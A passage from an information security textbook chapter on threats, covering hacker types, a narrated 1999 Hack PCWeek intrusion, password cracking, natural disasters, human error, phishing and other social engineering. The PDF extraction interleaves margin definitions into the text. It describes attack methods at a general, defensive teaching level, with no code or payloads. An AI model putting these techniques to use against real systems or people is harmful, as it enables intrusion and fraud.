computer researchers to look for vulnerabilities in the software used in its vehicles personal financial benefit or for a
crime organization or foreign gov-
and Web site, offering a reward to anyone who found an undocumented issue. In April
ernment; not to be confused with a
2015, the U.S. government did the same thing, inviting hackers to “Hack the Pentagon,” penetration tester.
of all places—a program that continues to this day. This type of “bug bounty” program
is an effort to convince both ethical and unethical hackers to help rather than hinder penetration tester
organizations in their security efforts. Other companies that recently invited such An information security profes-
attacks include Tesla Motors, Inc., the ride-share company Uber, and Google. sional with authorization to attempt
Once an expert hacker chooses a target system, the likelihood is high that he to gain system access in an effort
to identify and recommend reso-
or she will successfully enter the system. Fortunately for the many poorly protected lutions for vulnerabilities in those
organizations in the world, there are substantially fewer expert hackers than novice systems; also known as a pen tester.
hackers.
A new category of hacker has emerged over the last few years. The professional pen tester
hacker seeks to conduct attacks for personal benefit or the benefit of an employer, See penetration tester.
which is typically a crime organization or illegal government operation (see the sec-
tion on cyberterrorism). The professional hacker should not be confused with the penetration tester (or pen tester),
who has authorization from an organization to test its information systems and network defense and is expected to
provide detailed reports of the findings. The primary differences between professional hackers and penetration testers
are the authorization provided and the ethical professionalism displayed.
For more information about hacking, see the master’s thesis of Steven Kleinknecht, “Hacking Hackers: Ethno-
i graphic Insights into the Hacker Subculture—Definition, Ideology and Argot,” which you can find online either by
searching on the title or by going to https://macsphere.mcmaster.ca/handle/11375/10956.
script kiddies Expert hackers often become dissatisfied with attacking systems directly and
Novice hackers who use expertly turn their attention to writing software. These programs are automated exploits that
written software to attack a sys- allow novice hackers to act as script kiddies or packet monkeys. The good news is
tem; also known as skids, skiddies,
that if an expert hacker can post a script tool where a script kiddie or packet monkey
or script bunnies.
can find it, then systems and security administrators can find it, too. The developers
packet monkey of protection software and hardware and the service providers who keep defensive
A novice hacker who uses auto- systems up to date also stay informed about the latest in exploit scripts. As a result
mated exploits to engage in denial- of preparation and continued vigilance, attacks conducted by scripts are usually
of-service attacks.
predictable and can be adequately defended against.
Hack PCWeek
On September 20, 1999, PCWeek did the unthinkable: It set up two computers, one Linux-based, one Windows NT-based, and
challenged members of the hacking community to be the first to crack either system, deface the posted Web page, and claim a
$1,000 reward. Four days later, the Linux-based computer was hacked. Figure 2-7 shows the configuration of www.hackpcweek.com,
which is no longer functional. This feature provides the technical details of how the hack was accomplished not by a compromise
of the root operating system, but by the exploitation of an add-on CGI script with improper security checks.
In just under 20 hours, the hacker, known as JFS and hailing from Gibraltar (a.k.a. the Rock), used his advanced knowl-
edge of the Common Gateway Interface protocol (CGI) to gain control over the target server. He began as most attackers
do, with a standard port scan, finding only the HTTP port 80 open. A more detailed analysis of the Web servers revealed no
additional information.
Port scanning reveals TCP-based servers, such as telnet, FTP, DNS, and Apache, any of which are potential
access points for an attacker, wrote Pankaj Chowdhry in PCWeek. Further testing revealed that most of the
potentially interesting services refused connections, with JFS speculating that TCP Wrappers was used to
provide access control. The Web server port, 80/TCP, had to be open for Web access to succeed. JFS next used
a simple trick. If you send GET X HTTP/1.0 to a Web server, it will send back an error message (unless there
is a file named X) along with the standard Web server header. The header contains interesting facts, such
as the type and version of the Web server, and sometimes the host operating system and architecture.… As
the header information is part of the Web server standard, you can get this from just about any Web server,
including IIS.13
JFS then methodically mapped out the target, starting with the directory server, using the publicly offered WWW pages.
He identified commercial applications and scripts. Because he had learned nothing useful with the networking protocol
analyses, he focused on vulnerabilities in the dominant commercial application served on the system, PhotoAds. He was
able to access the source code, as it was offered with the product’s sale. With this knowledge, JFS was able to find, identify,
and look at the environment configuration script, but little else.
JFS then started his effort to exploit known server-side vulnerabilities such as the use of script includes and mod_PERL
embedded commands. When that did not pan out with his first attempt, he kept on, trying the process with every field to find
that a PERL regexp was in place to filter out most input before it was processed. JFS was able to locate just one user-assigned
variable that wasn’t being screened properly for malformed content. This single flaw encouraged him to keep up his effort.
JFS had located an ENV variable in the HTTP REFERER that was left unprotected. He first tried to use it with a server-side
include or mod_PERL embedded command to launch some code of his choosing. However, these services were not config-
ured on the machine.
JFS continued to poke and prod through the system configuration, looking specifically for vulnerabilities in the PhotoAds
CGI scripts. He then turned his attention to looking at open() and system() calls. Dead end.
JFS tried post commands, but the Web server stripped out one of the necessary components of the hack string, the %
sign, making the code fail to function. He then tried uploading files, but the file name variable was again being filtered by a
regexp, and they were just placed into a different directory and renamed anyway. He eventually gave up trying to get around
the rename function.
HACK PCWEEK TOPOLOGY
DB2 DB2 Linux Windows

on on NT server NT 4.0
Linux server
Bridge
hackpcweek.com
Bridge Web server
Raptor
firewall
performing
network
Internet
address
translation
Intrusion detection Discussion group
systems server
The topology of the honeynet used for this exercise was designed to be similar to that which
an administrator might put into a real production site. It was built without esoteric defenses,
sticking to standard firewall and network approaches.
Figure 2-7 Hack PCWeek topology
After extensive work to create a C-based executable and smuggle it into the server, constantly battling to minimize the
file size to the 8,190-byte restriction imposed on the get command, JFS hit another dead end, and turned his attention to
gaining root access.
“Using the bugtraq service, he found a cron exploit for which patches hadn’t been applied,” Chowdhry wrote. “He modi-
fied the hack to get a suidroot. This got him root access—and the ability to change the home page to the chilling: ‘This site
has been hacked. JFS was here.’”14
Game over.
To learn more about one of the leading vulnerability sharing Web sites, you can examine Bugtraq at
i www.securityfocus.com, which provides information on many of the latest security vulnerabilities.
There are a few well-documented cases of unskilled hackers getting caught. In February 2000, Michael Calce,
a.k.a. Mafiaboy, a 15-year-old Canadian, was responsible for a series of widely publicized denial-of-service attacks on
prominent Web sites. He pleaded guilty to 56 counts of computer mischief and was sentenced to eight months of open
custody (house arrest), to one year of probation with restricted Internet access, and to pay $250 to charity. His down-
fall came from his inability to delete the system logs that tracked his activity and his need to brag about his exploits
in chat rooms.15
In 2005, Jeanson James Ancheta used a large-scale botnet to compromise more than 400,000 systems that he then
rented to advertising companies. When he was caught and convicted, he was sentenced to 57 months in prison.16
In 2015, Albert Gonzalez, a.k.a. Soupnazi, part of Shadowcrew.com, was arrested and convicted of hacking and
stealing credit card data and other personal data from millions of accounts.17
The most notorious hacker in recent times is Kevin Mitnick, whose history is highlighted in the nearby feature.
While Mitnick was considered an expert hacker by most, he often used social engineering rather than technical skills
to collect information for his attacks.
i For more information on Kevin Mitnick and his “pro-security” consulting practice, visit http://mitnicksecurity.com/.
Notorious Outlaws: Mitnick and Snowden

Among the most notorious hackers to date is Kevin Mitnick. The son of divorced parents, Mitnick grew up in an unremarkable
middle-class environment. He got his start as a phreaker, later expanding his malicious activities to target computer com-
panies. After physically breaking into the Pacific Bell Computer Center for Mainframe Operations, he was arrested. Mitnick,
then 17, was convicted of destruction of data and theft of equipment and sentenced to three months in juvenile detention
and a year’s probation. He was arrested again in 1983 at the University of Southern California, where he was caught breaking
into Pentagon computers. His next hacking battle pitched him against the FBI, where his unusual defense of computer addic-
tion resulted in a one-year prison sentence and six months of counseling. In 1992, an FBI search of his residence resulted in
charges of illegally accessing a phone company’s computer, but this time Mitnick disappeared before his trial. In 1995, he was
finally tracked down and arrested. Because he was a known flight risk, he was held without bail for nearly five years, eight
months of it in solitary confinement. Afraid he would never get to trial, he eventually pleaded guilty to wire fraud, computer
fraud, and intercepting communications. He was required to get permission to travel or use any technology until January
2003. His newest job is on the lecture circuit, where he speaks out in support of information security and against hacking.18
Another notorious case involved Edward Snowden and the leak of a significantly large trove of classified intelligence. In
2009, Snowden began working as a contractor for Dell in service to a contract with the National Security Agency. In April 2012,
Snowden began collecting classified documents that described the U.S. government’s activities in amassing intelligence that
purportedly included proscribed surveillance of the domestic activities of U.S. citizens. After consulting with several journal-
ists in early 2013, he changed employers, working at the NSA as a contractor for Booz Allen Hamilton. He began sending
copies of NSA documents and other documents to the journalists he had met. In June 2013, Snowden was fired by Booz
Allen Hamilton and fled from Hawaii to Hong Kong, and the government charges against him began to mount. The public
debate about Snowden and NSA wiretap and surveillance activities continues—some perceive Snowden as a traitor, releasing
critical national intelligence to the nation’s adversaries, while others view him as a patriot, pursuing an ideal in uncovering
unconstitutional government misadventure.19
Escalation of Privileges
Once an attacker gains access to a system, the next step is to increase his or her privileges (privilege escalation).
While most accounts associated with a system have only rudimentary “use” permissions and capabilities, the attacker
needs administrative (a.k.a. admin) or “root” privileges. These privileges allow attackers to access information, modify
the system itself to view all information in it, and hide their activities by modifying system logs. The escalation of
privileges is a skill set in and of itself. However, just as novice hackers can use tools
privilege escalation to gain access, they can use tools to escalate privileges.
The unauthorized modification of One aggravating circumstance occurs when legitimate users accumulate
an authorized or unauthorized sys- unneeded privileges as they go about their assignments, having new privileges
tem user account to gain advanced
access and control over system
added for work tasks while keeping privileges they no longer need. Even over a
resources. short time, users can collect many unneeded privileges that an attacker could
exploit if a user’s credentials were compromised. Many organizations periodically review privileges and remove
those that are no longer needed.
A common example of privilege escalation is called jailbreaking or rooting. Owners of certain smartphones can
download and use a set of specialized tools to gain control over system functions, often against the original intentions
of the designers. The term jailbreaking is more commonly associated with Apple’s iOS devices, while the term rooting
is more common with Android-based devices. Apple’s tight controls over its iOS operating system prohibited other
developers from creating applications for iOS devices. In 2010, the U.S. Copyright Office issued a statement specifying
that jailbreaking a smartphone was legal as a special exemption under the Digital Millennium Copyright Act, but jail-
breaking a tablet (such as the iPad) was not.20 Apple continues to insist that jailbreak-
ing its devices violates the warranty and thus should not be attempted. jailbreaking
Escalating privileges to gain admin-
Hacker Variants istrator-level or root access control
over a smartphone operating sys-
Other terms for system rule breakers may be less familiar. The term cracker is now tem; typically associated with Apple
commonly associated with software copyright bypassing and password decryption. iOS smartphones. See also rooting.
With the removal of the copyright protection, software can be easily distributed
and installed. With the decryption of user passwords from stolen system files, user rooting
accounts can be illegally accessed. In current usage, the terms hacker and cracker Escalating privileges to gain
both denote criminal intent. administrator-level control over a
computer system (including smart-
Phreakers grew in fame in the 1970s when they developed devices called blue
phones); typically associated with
boxes that enabled them to make free calls from pay phones. Later, red boxes were Android OS smartphones. See also
developed to simulate the tones of coins falling in a pay phone, and finally black boxes jailbreaking.
emulated the line voltage. With the advent of digital communications, these boxes
became practically obsolete. Even with the loss of the colored box technologies, cracker
however, phreakers continue to cause problems for all telephone systems. A hacker who intentionally removes
In addition to the “Hack PCWeek” competition described earlier in this mod- or bypasses software copyright pro-
ule, numerous other “hacker challenges” are designed to provide targets to peo- tection designed to prevent unau-
thorized duplication or use.
ple who want to test their hacking abilities. For example, www.hackthissite.org
promotes a “free, safe, and legal training ground for hackers to test and expand
phreakers
their hacking skills.” 21 It is interesting that a site designed to support hacking
A hacker who manipulates the pub-
requires user registration and compliance with a legal disclaimer.
lic telephone system to make free
calls or disrupt services.
Password Attacks
Password attacks fall under the category of espionage or trespass just as lock picking cracking
falls under breaking and entering. Attempting to guess or reverse-calculate a pass- Attempting to reverse-engineer,
word is often called cracking. There are several alternative approaches to password remove, or bypass a password or
other access control protection,
cracking:
such as the copyright protection on
Brute force software (see cracker).
Dictionary
Rainbow tables brute force password
Social engineering attack
An attempt to guess a password by
The application of computing and network resources to try every possible pass- attempting every possible combi-
word combination is called a brute force password attack. If attackers can nar- nation of characters and numbers
in it.
row the field of target accounts, they can devote more time and resources to these
accounts. This is one reason to always change the password of the manufacturer’s
default administrator account.
10.4 password rule
An industry recommendation for
Brute force password attacks are rarely successful against systems that have
password structure and strength
adopted the manufacturer’s recommended security practices. Controls that limit the that specifies passwords should
number of unsuccessful access attempts within a certain time are very effective against be at least 10 characters long and
brute force attacks. As shown in Table 2-6, the strength of a password determines its abil- contain at least one of the following
four elements: an uppercase letter,
ity to withstand a brute force attack. Using best practice policies like the 10.4 password one lowercase letter, one number,
rule and systems that allow case-sensitive passwords can greatly enhance their strength. and one special character.
Table 2-6 Password Strength

Case-insensitive Passwords Using a Standard Alphabet Set
(No Numbers or Special Characters)
Odds of Cracking: 1 in (based on number of
Password Length characters ^ password length): Estimated Time to Crack*
8 208,827,064,576 0.36 seconds
9 5,429,503,678,976 9.27 seconds
10 141,167,095,653,376 4.02 minutes
11 3,670,344,486,987,780 1.74 hours
12 95,428,956,661,682,200 1.89 days
13 2,481,152,873,203,740,000 49.05 days
14 64,509,974,703,297,200,000 3.5 years
15 1,677,259,342,285,730,000,000 90.9 years
16 43,608,742,899,428,900,000,000 2,362.1 years
Case-sensitive Passwords Using a Standard Alphabet Set
with Numbers and 20 Special Characters
Odds of Cracking: 1 in (based on number of
Password Length characters ^ password length): Estimated Time to Crack*
8 2,044,140,858,654,980 1.0 hours
9 167,619,550,409,708,000 3.3 days
10 13,744,803,133,596,100,000 271.7 days
11 1,127,073,856,954,880,000,000 61.0 years
12 92,420,056,270,299,900,000,000 5,006.0 years
13 7,578,444,614,164,590,000,000,000 410,493.2 years
14 621,432,458,361,496,000,000,000,000 33,660,438.6 years
15 50,957,461,585,642,700,000,000,000,000 2,760,155,968.2 years
16 4,178,511,850,022,700,000,000,000,000,000 226,332,789,392.1 years
Note: Modern workstations are capable of using multiple CPUs, further decreasing time to crack, or simply splitting the workload among multiple systems.
*
Estimated Time to Crack is based on a 2020-era Intel i9-10900X 10 Core CPU performing 585 Dhrystone GFLOPS (giga/billion floating point operations per
second) at 5.2 GHz (overclocked).
The dictionary password attack , or simply dictionar y attack, is a variation of the brute force attack that
narrows the field by using a dictionary of common passwords and includes information related to the target
user, such as names of relatives or pets, and familiar numbers such as phone
dictionary password numbers, addresses, and even Social Security numbers. Organizations can use
attack similar dictionaries to disallow passwords during the reset process and thus
A variation of the brute force guard against passwords that are easy to guess. In addition, rules requiring
password attack that attempts to numbers and special characters in passwords make the dictionary attack less
narrow the range of possible pass- effective.
words guessed by using a list of
common passwords and possibly A far more sophisticated and potentially much faster password attack is
including attempts based on the possible if the attacker can gain access to an encrypted password file, such as
target’s personal information. the Security Account Manager (SAM) data file. While these password files con-
tain hashed representations of users’ passwords—not the actual passwords,
rainbow table and thus cannot be used by themselves—the hash values for a wide variety of
A table of hash values and their passwords can be looked up in a database known as a rainbow table . These
corresponding plaintext values that
plain text files can be quickly searched, and a hash value and its correspond-
can be used to look up password
values if an attacker is able to steal ing plaintext value can be easily located. Module 10, “Cryptography,” describes
a system’s encrypted password file. plaintext, ciphertext, and hash values in greater detail.
Did you know that a space can change how a word is used? For example, “plaintext” is a special term from the
i field of cryptography that refers to textual information a cryptosystem will transmit securely as ciphertext. It is
plaintext before it is encrypted, and it is plaintext after it is decrypted, but it is ciphertext in between. However,
the phrase “plain text” is a term from the field of information systems that differentiates the text characters you
type from the formatted text you see in a document. For more information about cryptosystems and cryptog-
raphy, see Module 10.
Social Engineering Password Attacks

While social engineering is discussed in detail later in the section called “Human Error or Failure,” it is worth men-
tioning here as a mechanism to gain password information. Attackers posing as an organization’s IT professionals
may attempt to gain access to systems information by contacting low-level employees and offering to help with their
computer issues. After all, what employee doesn’t have issues with computers? By posing as a friendly help-desk or
repair technician, the attacker asks employees for their usernames and passwords, and then uses the information to
gain access to organizational systems. Some even go so far as to resolve the user’s issues. Social engineering is much
easier than hacking servers for password files.
Forces of Nature
Forces of nature, sometimes called acts of God, can present some of the most dangerous threats because they usu-
ally occur with little warning and are beyond the control of people. These threats, which include events such as fires,
floods, earthquakes, landslides, mudslides, windstorms, sandstorms, solar flares, and lightning as well as volcanic
eruptions and insect infestations, can disrupt not only people’s lives but the storage, transmission, and use of infor-
mation. Severe weather was suspected in three 2008 outages in the Mediterranean that affected Internet access to
the Middle East and India.
Natural disasters also include pandemics, such as the 2020 COVID-19 outbreak. At the time of this writing, the
pandemic was still under way, and many small businesses were shut down, some never to reopen. The majority of the
world’s infrastructure continues to function, but if the virus had been more deadly, its global impact could have been
even more disastrous. Knowing a region’s susceptibility to certain natural disasters is a critical planning component
when selecting new facilities for an organization or considering the location of off-site data backup.
Because it is not possible to avoid threats from forces of nature, organizations must implement controls to limit
damage and prepare contingency plans for continued operations, such as disaster recovery plans, business continuity
plans, and incident response plans. These threats and plans are discussed in detail in Module 5, “Contingency Planning
and Incident Response.”
Another term you may encounter, force majeure, can be translated as “superior force,” which includes forces of
nature as well as civil disorder and acts of war.
Fire
A structural fire can damage a building with computing equipment that comprises all or part of an information system.
Damage can also be caused by smoke or by water from sprinkler systems or firefighters. This threat can usually be
mitigated with fire casualty insurance or business interruption insurance.
Floods
Water can overflow into an area that is normally dry, causing direct damage to all or part of the information system or
the building that houses it. A flood might also disrupt operations by interrupting access to the buildings that house the
information system. This threat can sometimes be mitigated with flood insurance or business interruption insurance.
Earthquakes
An earthquake is a sudden movement of the earth’s crust caused by volcanic activity or the release of stress accumu-
lated along geologic faults. Earthquakes can cause direct damage to the information system or, more often, to the build-
ing that houses it. They can also disrupt operations by interrupting access to the buildings that house the information
system. In 2006, a large earthquake just off the coast of Taiwan severed several underwater communications cables,
shutting down Internet access for more than a month in China, Hong Kong, Taiwan, Singapore, and other countries
throughout the Pacific Rim. In 2013, major earthquakes and the resulting tsunami severed cables around Japan. In 2016,
several undersea cables around Singapore were damaged, resulting in substantial loss of communications capacity to
the island. In the United States, earthquakes impacted the country from Alaska to North Carolina in 2020. Most cause
some damage to property. Losses due to earthquakes can sometimes be mitigated with casualty insurance or business
interruption insurance, but earthquakes usually are covered by a separate policy.
Lightning
Lightning is an abrupt, discontinuous natural electric discharge in the atmosphere. Lightning usually damages all or part
of the information system and its power distribution components. It can also cause fires or other damage to the building
that houses the information system, and it can disrupt operations by interfering with access to those buildings. In 2012,
a lightning strike to a communications cable near Fort Wayne, Indiana, left almost 100,000 residents without phone and
Internet access. Damage from lightning can usually be prevented with specialized lightning rods placed strategically on
and around the organization’s facilities and by installing special circuit protectors in the organization’s electrical ser-
vice. Losses from lightning may be mitigated with multipurpose casualty insurance or business interruption insurance.
Landslides, Mudslides, and Avalanches

The downward slide of a mass of earth, rock, or snow can directly damage the information system or, more likely, the
building that houses it. Landslides, mudslides, and avalanches also disrupt operations by interfering with access to
the buildings that house the information system. This threat can sometimes be mitigated with casualty insurance or
business interruption insurance.
Tornados and Severe Windstorms

A tornado is a rotating column of air that can be more than a mile wide and whirl at destructively high speeds. Usually
accompanied by a funnel-shaped downward extension of a cumulonimbus cloud, tornados can directly damage all
or part of the information system or, more likely, the building that houses it. Tornadoes can also interrupt access to
the buildings that house the information system. Wind shear is a much smaller and linear wind effect, but it can have
similar devastating consequences. These threats can sometimes be mitigated with casualty insurance or business
interruption insurance.
Hurricanes, Typhoons, and Tropical Depressions

A severe tropical cyclone that originates in equatorial regions of the Atlantic Ocean or Caribbean Sea is referred to as
a hurricane, and one that originates in eastern regions of the Pacific Ocean is called a typhoon. Many hurricanes and
typhoons originate as tropical depressions—collections of multiple thunderstorms under specific atmospheric condi-
tions. Excessive rainfall and high winds from these storms can directly damage all or part of the information system or,
more likely, the building that houses it. Organizations in coastal or low-lying areas may suffer flooding as well. These
storms may also disrupt operations by interrupting access to the buildings that house the information system. This
threat can sometimes be mitigated with casualty insurance or business interruption insurance.
Tsunamis
A tsunami is a very large ocean wave caused by an underwater earthquake or volcanic eruption. These events can
directly damage the information system or the building that houses it. Organizations in coastal areas may experience
tsunamis. They may also disrupt operations through interruptions in access or electrical power to the buildings that
house the information system. This threat can sometimes be mitigated with casualty insurance or business interrup-
tion insurance.
While you might think a tsunami is a remote threat, much of the world’s coastal area is under some threat from
such an event. In 2011, the Fukushima Daiichi nuclear disaster resulted from an earthquake and subsequent tsunami;
the disruption to the Japanese economy directly and indirectly affected much of the world. The United States coastline
has exposure to tsunamis caused by severe earthquakes or landslides that might begin across the Atlantic Ocean,
Pacific Ocean, or the Gulf of Mexico.
The earthquake that shook Alaska in 2020 was expected to result in a significant tsunami. The U.S. Coast Guard
was mobilized, and the coastal regions were warned. Fortunately, the resulting tsunami only reached about a foot high,
almost indistinguishable from normal wave patterns.
To read about technology used to save lives after tsunamis, visit the Web site of NOAA’s National Weather Service
i U.S. Tsunami Warning Center. From there, you can find out how state-of-the-art satellite, computer, and network
systems are used to notify people in the country about emergency tsunami events. You can see the Web page
at www.tsunami.gov.
Electrostatic Discharge
Electrostatic discharge (ESD), also known as static electricity, is usually little more than a nuisance. However, the mild
static shock we receive when walking across a carpet can be costly or dangerous when it ignites flammable mixtures
and damages costly electronic components. An employee walking across a carpet on a cool, dry day can generate
up to 12,000 volts of electricity. Humans cannot detect static electricity until it reaches around 1,500 volts. When it
encounters technology, especially computer hard drives, ESD can be catastrophic, as damage can be caused by as
little as 10 volts.22
Static electricity can draw dust into clean-room environments or cause products to stick together. The cost of ESD-
damaged electronic devices and interruptions to service can be millions of dollars for critical systems. ESD can also
cause significant loss of production time in information processing. Although ESD can disrupt information systems, it
is not usually an insurable loss unless covered by business interruption insurance.
Dust Contamination
Some environments are not friendly to the hardware components of information systems. Accumulation of dust and
debris inside systems can dramatically reduce the effectiveness of cooling mechanisms and potentially cause compo-
nents to overheat. Some specialized technology, such as CD or DVD optical drives, can suffer failures due to excessive
dust contamination. Because it can shorten the life of information systems or cause unplanned downtime, this threat
can disrupt normal operations.
Solar Activity
While most of us are protected by the earth’s atmosphere from the more dramatic effects of solar activity, such as
radiation and solar flares, our communications satellites bear the brunt of such exposure. Extreme solar activity can
affect power grids, however, as in Quebec in 1989, when solar currents in the magnetosphere affected power lines,
blowing out electric transformers and power stations. Business communications that are heavily dependent on satel-
lites should consider the potential for disruption.
Human Error or Failure

This category includes acts performed without intent or malicious purpose or in ignorance by an authorized user.
When people use information assets, mistakes happen. Similar errors happen when people fail to follow established
policy. Inexperience, improper training, and incorrect assumptions are just a few things that can cause human error
or failure. Regardless of the cause, even innocuous mistakes can produce extensive damage. In 2017, an employee
debugging an issue with the Amazon Web Services (AWS) billing system took more servers down than he was sup-
posed to, resulting in a chain reaction that took down several large Internet sites. It took time to restart the downed
systems, resulting in extended outages for several online vendors, while other sites were unable to fully operate due
to unavailable AWS services.23
In 1997, a simple keyboarding error caused worldwide Internet outages:
In April 1997, the core of the Internet suffered a disaster. Internet service providers lost connectivity
with other ISPs due to an error in a routine Internet router-table update process. The resulting outage
effectively shut down a major portion of the Internet for at least twenty minutes. It has been estimated
that about 45 percent of Internet users were affected. In July 1997, the Internet went through yet
another more critical global shutdown for millions of users. An accidental upload of a corrupt database
to the Internet’s root domain servers occurred. Because this provides the ability to address hosts on the
Net by name (i.e., eds.com), it was impossible to send e-mail or access Web sites within the .com and
.net domains for several hours. The .com domain comprises a majority of the commercial enterprise
users of the Internet.24
social engineering One of the greatest threats to an organization’s information security is its own
The process of using interpersonal employees, as they are the threat agents closest to the information. Because employ-
skills to convince people to reveal ees use data and information in everyday activities to conduct the organization’s
access credentials or other valuable
business, their mistakes represent a serious threat to the confidentiality, integrity,
information to an attacker.
and availability of data—even, as Figure 2-8 suggests, relative to threats from outsid-
ers. Employee mistakes can easily lead to revelation of classified data, entry of erroneous data, accidental deletion or
modification of data, storage of data in unprotected areas, and failure to protect information. Leaving classified informa-
tion in unprotected areas, such as on a desktop, on a Web site, or even in the trash can, is as much a threat as a person
who seeks to exploit the information, because the carelessness can create a vulnerability and thus an opportunity for
an attacker. However, if someone damages or destroys data on purpose, the act belongs to a different threat category.
In 2014, New York’s Metro-North railroad lost power when one of its two power supply units was taken offline for
repairs. Repair technicians apparently failed to note the interconnection between the systems, resulting in a two-hour
power loss. Similarly, in 2016, Telstra customers in several major cities across Australia lost communications for more
than two hours due to an undisclosed human error.
Human error or failure often can be prevented with training, ongoing awareness activities, and controls. These
controls range from simple activities, such as requiring the user to type a critical command twice, to more complex
procedures, such as verifying commands by a second party. An example of the latter is the performance of key recov-
ery actions in PKI systems. Many military applications have robust, dual-approval controls built in. Some systems
that have a high potential for data loss or system outages use expert systems to monitor human actions and request
confirmation of critical inputs.
Humorous acronyms are commonly used when attributing problems to human error. They include PEBKAC (prob-
lem exists between keyboard and chair), PICNIC (problem in chair, not in computer), and ID-10-T error (idiot).
Social Engineering
In the context of information security, social engineering is used by attackers to gain system access or information
that may lead to system access. There are several social engineering techniques, which usually involve a perpetrator
posing as a person who is higher in the organizational hierarchy than the victim. To prepare for this false representa-
tion, the perpetrator already may have used social engineering tactics against others in the organization to collect
seemingly unrelated information that, when used together, makes the false representation more credible. For instance,
anyone can check a company’s Web site or even call the main switchboard to get the name of the CIO; an attacker
may then obtain even more information by calling others in the company and falsely asserting his or her authority
by mentioning the CIO’s name. Social engineering attacks may involve people posing as new employees or as current
employees requesting assistance to prevent getting fired. Sometimes attackers threaten, cajole, or beg to sway the
© Suwat Rujimethakul/
© Andrey Popov/
iStock.com
iStock.com
Tommy Twostory,
convicted burglar
Elite Skillz,
© Sdominick/iStock.com
wannabe hacker
Harriett Allthumbs,
confused the copier with the shredder
when preparing the annual sales report
Figure 2-8 The biggest threat—acts of human error or failure

target. The infamous hacker Kevin Mitnick, whose exploits are detailed earlier in this business e-mail
module, once stated: compromise (BEC)
A social engineering attack involv-
People are the weakest link. You can have the best technology; firewalls, ing the compromise of an organi-
intrusion-detection systems, biometric devices … and somebody can call an zation’s e-mail system followed by
unsuspecting employee. That’s all she wrote, baby. They got everything.25 a series of forged e-mail messages
directing employees to transfer
funds to a specified account, or
Business E-Mail Compromise (BEC) to purchase gift cards and send
them to an individual outside the
A new type of social engineering attack has surfaced in the last few years. Business organization.
e-mail compromise (BEC) combines the exploit of social engineering with the com-
promise of an organization’s e-mail system. An attacker gains access to the system
advance-fee fraud
either through another social engineering attack or technical exploit, and then pro- (AFF)
ceeds to request that employees within the organization, usually administrative
A form of social engineering, typi-
assistants to high-level executives, transfer funds to an outside account or purchase cally conducted via e-mail, in which
gift cards and send them to someone outside the organization. According to the FBI, an organization or some third party
indicates that the recipient is due an
almost 24,000 BEC complaints were filed in 2019, with projected losses of more than
exorbitant amount of money and
$1.7 billion. Reporting these crimes quickly is the key to a successful resolution. The needs only to send a small advance
FBI Internet Crime Complaint Center’s Recovery Asset Team has made great strides fee or personal banking informa-
in freezing and recovering finances that are stolen through these types of scams, as tion to facilitate the transfer.
long as they are reported quickly and the perpetrators are inside the United States.26
Advance-Fee Fraud
Another social engineering attack called the advance-fee fraud (AFF), internationally known as the 4-1-9 fraud, is
named after a section of the Nigerian penal code. The perpetrators of 4-1-9 schemes often use the names of fictitious
companies, such as the Nigerian National Petroleum Company. Alternatively, they may invent other entities, such as a
bank, government agency, long-lost relative, lottery, or other nongovernmental organization. See Figure 2-9 for a sample
letter used for this type of scheme.
The scam is notorious for stealing funds from credulous people, first by requiring them to participate in a pro-
posed money-making venture by sending money up front, and then by soliciting an endless series of fees. These 4-1-9
schemes are even suspected to involve kidnapping, extortion, and murder. According to The 419 Coalition, more than
$100 billion has been swindled from victims as of 2020.27
You can go to the Advance Fee Fraud Coalition’s Web site to see how the Nigerian Government’s Economic and
i Financial Crimes Commission is fighting AFF and 4-1-9 crimes. Visit https://efccnigeria.org/efcc/.
Phishing
Many other attacks involve social engineering. One such attack is described by the Computer Emergency Response
Team/Coordination Center (CERT/CC):
CERT/CC has received several incident reports concerning users receiving requests to take an action that
results in the capturing of their password. The request could come in the form of an e-mail message,
a broadcast, or a telephone call. The latest ploy instructs the user to run a “test” program, previously
installed by the intruder, which will prompt the user for his or her password. When the user executes
the program, the user’s name and password are e-mailed to a remote site.
These messages can appear to be from a site administrator or root. In reality, phishing
they may have been sent by an individual at a remote site, who is trying to A form of social engineering in
gain access or additional access to the local machine via the user’s account.28 which the attacker provides what
appears to be a legitimate com-
While this attack may seem crude to experienced users, the fact is that many munication (usually e-mail), but it
contains hidden or embedded code
e-mail users have fallen for it. These tricks and similar variants are called phishing
that redirects the reply to a third-
attacks. They gained national recognition with the AOL phishing attacks that were party site in an effort to extract per-
widely reported in the late 1990s, in which attackers posing as AOL technicians sonal or confidential information.
Figure 2-9 Example of a Nigerian 4-1-9 fraud letter

attempted to get login credentials from AOL subscribers. The practice became so widespread that AOL added a warn-
ing to all official correspondence that no AOL employee would ever ask for password or billing information. Variants
of phishing attacks can leverage their purely social engineering aspects with a technical angle, such as that used in
pharming, spoofing, and redirection attacks, as discussed later in this module.
Another variant is spear phishing. While normal phishing attacks target as many recipients as possible, a spear
phisher sends a message to a small group or even one person. The message appears to be from an employer, a col-
league, or other legitimate correspondent. This attack sometimes targets users of a certain product or Web site. When
this attack is directed at a specific person, it is called spear phishing. When the intended victim is a senior executive,
it may be called whaling or whale phishing.
Phishing attacks use two primary techniques, often in combination with one another: URL manipulation and Web
site forgery. In Uniform Resource Locator (URL) manipulation, attackers send an HTML-embedded e-mail message or
a hyperlink whose HTML code opens a forged Web site. For example, Figure 2-10 shows an e-mail that appears to have
come from Regions Bank. Phishers typically use the names of large banks or retailers because potential targets are
more likely to have accounts with them. In Figure 2-11, the link appears to be to RegionsNetOnline, but the HTML code
actually links the user to a Web site in Poland. This is a very simple example; many phishing attackers use sophisti-
cated simulated Web sites in their e-mails, usually copied from actual Web sites. Companies that are commonly used
in phishing attacks include banks, lottery organizations, and software companies like Microsoft, Apple, and Google.
In the forged Web site shown in Figure 2-11, the page looks legitimate; when users click either of the bottom two
buttons—Personal Banking Demo or Enroll in RegionsNet—they are directed to the authentic bank Web page. The
Access Accounts button, however, links to another simulated page that looks just like the real bank login Web page.
When victims type their banking ID and password, the attacker records that infor-
mation and displays a message that the Web site is now offline. The attackers can
spear phishing use the recorded credentials to perform transactions, including fund transfers, bill
A highly targeted phishing attack. payments, or loan requests.
Figure 2-10 Phishing example: lure
Figure 2-11 Phishing example: fake Web site

People can use their Web browsers to report suspicious Web sites that might have been used in phishing attacks.
Figure 2-12 shows the Internal Revenue Service (IRS) Web site that provides instructions on reporting IRS-spoofed
phishing attacks.
Pretexting
pretexting
Pretexting, sometimes referred to as phone phishing or voice phishing (vishing), is
A form of social engineering in
which the attacker pretends to pure social engineering. The attacker calls a potential victim on the telephone and
